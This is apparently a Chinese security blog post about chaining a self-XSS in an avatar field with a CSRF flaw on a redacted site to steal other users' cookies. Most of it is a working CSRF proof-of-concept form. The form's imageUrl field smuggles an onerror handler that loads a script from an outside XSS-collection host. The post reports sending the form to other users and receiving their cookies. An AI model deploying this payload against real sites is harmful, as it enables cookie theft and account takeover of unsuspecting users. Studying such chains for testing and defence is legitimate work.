#Sefl-xss 配合 Csrf  变废为宝

案例:

某站在测试时发现头像处存在 xss,但是Self-xss类型

《一套组合拳:slef-xss配合Csrf变废为宝打用户Cookie》

上传图片,进行抓包

《一套组合拳:slef-xss配合Csrf变废为宝打用户Cookie》

查看效果

《一套组合拳:slef-xss配合Csrf变废为宝打用户Cookie》

Self-xss无疑,但是发现此处在也存在Csrf的安全问题,那么配合来了

生成Csrf Poc

<html>

  <!– CSRF PoC – generated by Burp Suite Professional –>

  <body>

  <script>history.pushState(”, ”, ‘/’)</script>

    <form action=”https://xxx.com/user/updateUserInfo” method=”POST”>

      <input type=”hidden” name=”uploadFile” value=”https://xxx.com/0.jpg” />

      <input type=”hidden” name=”areaAll” value=”Huadian,China” />

      <input type=”hidden” name=”area” value=”100401″ />

      <input type=”hidden” name=”mobileNo” value=”0086-1222322″ />

      <input type=”hidden” name=”imageUrl” value=”https://xxx.com/0.jpg'” onerror=s=createElement(‘script’);body.appendChild(s);s.src=’https://60.wf/M’;//”” />

      <input type=”submit” value=”Submit request” />

    </form>

  </body>

</html>

以此Csrf Poc 发送给你Other 用户,结果下图:

《一套组合拳:slef-xss配合Csrf变废为宝打用户Cookie》

Xss接收平台:你的快递己到达!

《一套组合拳:slef-xss配合Csrf变废为宝打用户Cookie》

 

注:单一安全Bug造成的安全问题比常小(或忽略不计 如Self-xss),但是组合结果造成的隐患比较大。